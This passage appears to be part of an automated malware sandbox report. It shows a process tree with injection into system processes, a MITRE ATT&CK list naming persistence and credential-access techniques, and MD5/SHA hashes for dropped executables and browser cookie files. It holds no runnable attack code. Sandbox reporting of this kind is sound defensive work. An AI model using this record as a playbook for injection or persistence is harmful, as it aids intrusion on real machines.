                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 852
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          PID:3168
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\D46C.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\D46C.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                        PID:6432
                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:5448
                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:6944
                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:5424
                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:2744
                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                PID:2892
                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:6748
                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                  PID:6888
                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:1156
                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                    PID:4832
                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:6448

                                                                                                                                                                                                    Network

                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                    Execution

                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1053

                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1060

                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1053

                                                                                                                                                                                                    BITS Jobs

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1197

                                                                                                                                                                                                    Privilege Escalation

                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1053

                                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                                    3
                                                                                                                                                                                                    T1112

                                                                                                                                                                                                    BITS Jobs

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1197

                                                                                                                                                                                                    Install Root Certificate

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1130

                                                                                                                                                                                                    Credential Access

                                                                                                                                                                                                    Credentials in Files

                                                                                                                                                                                                    2
                                                                                                                                                                                                    T1081

                                                                                                                                                                                                    Discovery

                                                                                                                                                                                                    Software Discovery

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1518

                                                                                                                                                                                                    Query Registry

                                                                                                                                                                                                    5
                                                                                                                                                                                                    T1012

                                                                                                                                                                                                    System Information Discovery

                                                                                                                                                                                                    6
                                                                                                                                                                                                    T1082

                                                                                                                                                                                                    Security Software Discovery

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1063

                                                                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                                                                    2
                                                                                                                                                                                                    T1120

                                                                                                                                                                                                    Remote System Discovery

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1018

                                                                                                                                                                                                    Collection

                                                                                                                                                                                                    Data from Local System

                                                                                                                                                                                                    2
                                                                                                                                                                                                    T1005

                                                                                                                                                                                                    Command and Control

                                                                                                                                                                                                    Web Service

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1102

                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                                                                                    • C:\Program Files\Internet Explorer\UGHJRKDSJJ\ultramediaburner.exe
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                                                                                    • C:\Program Files\Internet Explorer\UGHJRKDSJJ\ultramediaburner.exe
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                                                                                    • C:\Program Files\install.dat
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      806c3221a013fec9530762750556c332

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                                                                                                    • C:\Program Files\install.dll
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      10a67c77f5f268e6fed73a351b6e91c2

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      b5c76da3244a966a23a7c283b61d11e0823278d6

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      9add36a186a649e6197bc52d093ba38601d247deba1123d1ac8ef7876c3549cb

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      80259c1f49c02a90fa3dc6d15464ceb4f7dcbe2e571ac332a9177f38c37db524f24749889da5198e459e07252088cd15594bd9e9ac95eddd18060ab876d57881

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\2IXHK1XF.cookie
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      04f45f3256e7b46672f536eafd6e4845

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      bfd212d2c35018cb59182b7402889ebb3bbbb0fd

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      68541a8b878bbb0cf5a3debbdbfe597d9a2f49bf996b4173c7e7324173c0c6a0

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      d5af9b0c206b6f85a9b4e70b50b0cc1971676bde9901a0d6d8fe3328e260c5d024eb08e7201fa61b6c385afd48b2ccd81ff5ea444ae01cf7e4006f2af9bed3cf

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\IP32SC70.cookie
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      ee0eb95045884de74f769e4e025f3d3d

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      ef024e097b70adb508a319cbca2ab2f078a2de6e

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      d5113a0b453e6de94601e06adcb377e99c4a4e60afa2cbfc7c276979578b67ff

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      bb54cd05e68f1d0b256cfb72e82d9161ff55f97a04d2648b43be66c11879be1b3dd2c1a8c24816a8b5d2661e444299dcd2bd7563b53f71ea11b40493adeacf45

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\K5165LD3.cookie
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      3c0a3b7b2ade58364a01d985c7fc1aab

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      68911eb460cab52d18065cfc4fcc1975174f51bf

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      8a1164eacc54bb3e23f30202df4b69e7b0326f576793129d7213befb7fd535c0

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      19cd76755d8c556c85a098d0991106218d746f0b06aabd452a3cc1342e77278c3ea22df2963abf63628608a5671f1485806ce8db70938f3877e0287c5612f01d

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      5afb716c6eb2e213325cf8e0b48b30d2

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      3832c8d9493d0a7896f2447b17d55fa41a692d93

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      4accba28a3c759cb0e5f69e515519bf29c811fa5fa44935a1ca9fe1aef032e61

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      ba67479cf602286ab7aa34df87d254d841e46ad409aacc83d17179af1fd1deed4c5f6ee9ec1ce4279ec9e53ce3a7863d43537185c86fc118047f7c32c4fde8b3

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      524f013773a9b3d00766532f8e6f8872

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      dfd630bbc7a41628054261b6259af9b1994c3716

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      6832a097c6bb205d0505293b344d842a4f42a1727d467b43e0a0156e6d41f3e6

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      7bfeaa060f36f0a50acddcd84b28fc3d3103f317f75aeed72a0e6e57d913f207c763d484047dadb826a1d721c8d66a36f33b07009d53d506d05b3b053a1a3073

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1964142196.exe
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      3a5aa6041f6987d4b375ef6c9d3728d1

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      f40bcc90890cc1d848abdb163d6a3744712508d0

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      2b85bbff2d434d0400c41fdefc2c8630b7895a5fa7f988775e0787814ca8529f

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      8f9dc4b8aca6738992d8d6b5a2185dac50613ee233e4684bc43034627e99a7be0049700f766dbe36e1d2458cee3e7b26d5c23c2fe59296f0524a02536d389e1c

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1964142196.exe
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      3a5aa6041f6987d4b375ef6c9d3728d1

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      f40bcc90890cc1d848abdb163d6a3744712508d0

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      2b85bbff2d434d0400c41fdefc2c8630b7895a5fa7f988775e0787814ca8529f

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      8f9dc4b8aca6738992d8d6b5a2185dac50613ee233e4684bc43034627e99a7be0049700f766dbe36e1d2458cee3e7b26d5c23c2fe59296f0524a02536d389e1c

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\MSI90ED.tmp
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      d07ddd437009ebb9c21882579bf2df0d

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      a24a636db25ed29e5353fa5d274bf80c2ab8ad98

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      c4f49b995e259a043af81d987c6781b8736f5709348bb997edad183ccc396caf

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      8c845ec3effc0041db3a550adddc1f175e1169ca00767c89d38fabaa59f97ae987b529c0ad71d0def0007a21fb3fd98200b0834408c5889d93f9ea035c60eca3

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\MSI9265.tmp
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      5a25fb13ed470b77eefd2eb89cb62c47

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      3dbe567e3c8c8cd0f7e3c71a2536578ee11bf2a6

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      0dca4854897ca77080c57936ad5c7c6c5f5c656a5785c09c7d2c1d196e4f3336

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      2ec64666ad42e955e91378af855da59d3bcfb4cc3574bf023dda878c7d3e3dec442625de6e6b0434d1caf86a525395b04038cf7fdc6c292405d9f19c6f4e9952

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      3bc84c0e8831842f2ae263789217245d

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      3bc84c0e8831842f2ae263789217245d

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      6e81752fb65ced20098707c0a97ee26e

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      948905afef6348c4141b88db6c361ea9cfa01716

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      b978743a252c7d0661b1a41a60a68ee1a4d4ff5f21c597ebbe1c50dbe91dbed6

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      00c870461d47b7479f15594659141e3ced7c3f3d4b4151fb7776ab62d4816c587b388d024ab8edff1190bd23148897f085f736e897657c6f02a8f62f7af1cfaa

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      6e81752fb65ced20098707c0a97ee26e

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      948905afef6348c4141b88db6c361ea9cfa01716

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      b978743a252c7d0661b1a41a60a68ee1a4d4ff5f21c597ebbe1c50dbe91dbed6

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      00c870461d47b7479f15594659141e3ced7c3f3d4b4151fb7776ab62d4816c587b388d024ab8edff1190bd23148897f085f736e897657c6f02a8f62f7af1cfaa

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      25d9f83dc738b4894cf159c6a9754e40

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      152a0e0a8319c8d6bfbe6ae71ae5dda5cba2caca

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      8216cf00254d2febdfa67014d7265e008a6f485724c68579c5921f91a0069135

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      41a995bd29eaaf8b9ebed313f33eaf6ba217e331341888feb274df22328aca34a15bc0dd761cbdadf8d0491ed80d18025b88d8e1db862be2a886d99005b11f22

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      25d9f83dc738b4894cf159c6a9754e40

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      152a0e0a8319c8d6bfbe6ae71ae5dda5cba2caca

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      8216cf00254d2febdfa67014d7265e008a6f485724c68579c5921f91a0069135

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      41a995bd29eaaf8b9ebed313f33eaf6ba217e331341888feb274df22328aca34a15bc0dd761cbdadf8d0491ed80d18025b88d8e1db862be2a886d99005b11f22

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\biew1rqd.qeh\KiffMainE1.exe
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      9ffeb510285c1c7450b00cad5cf7e28b

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      9b2db42751d4715d345ebbc1982118d91a6f9257

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      bab076688d1bdf3ce559a1a8ae33172b39a6e342609115ee4bf7646a863ebc10

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      0efbaafe0ed2de24254462df95d4b78d4c95b4762ce06b00ea8c38334762d601f146efcf25e5f76ec40a89d2a4404b49abf50b605e7c3298e21d7a9bb7025bcb

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\biew1rqd.qeh\KiffMainE1.exe
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      9ffeb510285c1c7450b00cad5cf7e28b

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      9b2db42751d4715d345ebbc1982118d91a6f9257

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      bab076688d1bdf3ce559a1a8ae33172b39a6e342609115ee4bf7646a863ebc10

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      0efbaafe0ed2de24254462df95d4b78d4c95b4762ce06b00ea8c38334762d601f146efcf25e5f76ec40a89d2a4404b49abf50b605e7c3298e21d7a9bb7025bcb

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\c4-832bd-f70-4d3b7-02dfe6035e244\Duhapyveby.exe
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      24988abf1cac1c74e9385b4bff16e8f7

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      50bae2be9668aad4f3a3a7d404c731f541b12f67

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      afad8cc3e378f4d22ca2e325a63998e4bcbb70509135532b450c22fdd47e993c

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      a707b54611976264a3671907faabd817e58e4ee572637ad1193b7c346b7cb63b98a8e52a87cb2b135a5e40f0e97e3f040a04804c0164a1d6caa856b2f1fe742f

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\c4-832bd-f70-4d3b7-02dfe6035e244\Duhapyveby.exe
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      24988abf1cac1c74e9385b4bff16e8f7

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      50bae2be9668aad4f3a3a7d404c731f541b12f67

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      afad8cc3e378f4d22ca2e325a63998e4bcbb70509135532b450c22fdd47e993c

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      a707b54611976264a3671907faabd817e58e4ee572637ad1193b7c346b7cb63b98a8e52a87cb2b135a5e40f0e97e3f040a04804c0164a1d6caa856b2f1fe742f

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\c4-832bd-f70-4d3b7-02dfe6035e244\Duhapyveby.exe.config
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      98d2687aec923f98c37f7cda8de0eb19

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\c4-832bd-f70-4d3b7-02dfe6035e244\Kenessey.txt
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      97384261b8bbf966df16e5ad509922db

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\da-9df13-0cd-f6089-f14733e3ac2f9\Vividesafu.exe
                                                                                                                                                                                                      MD5

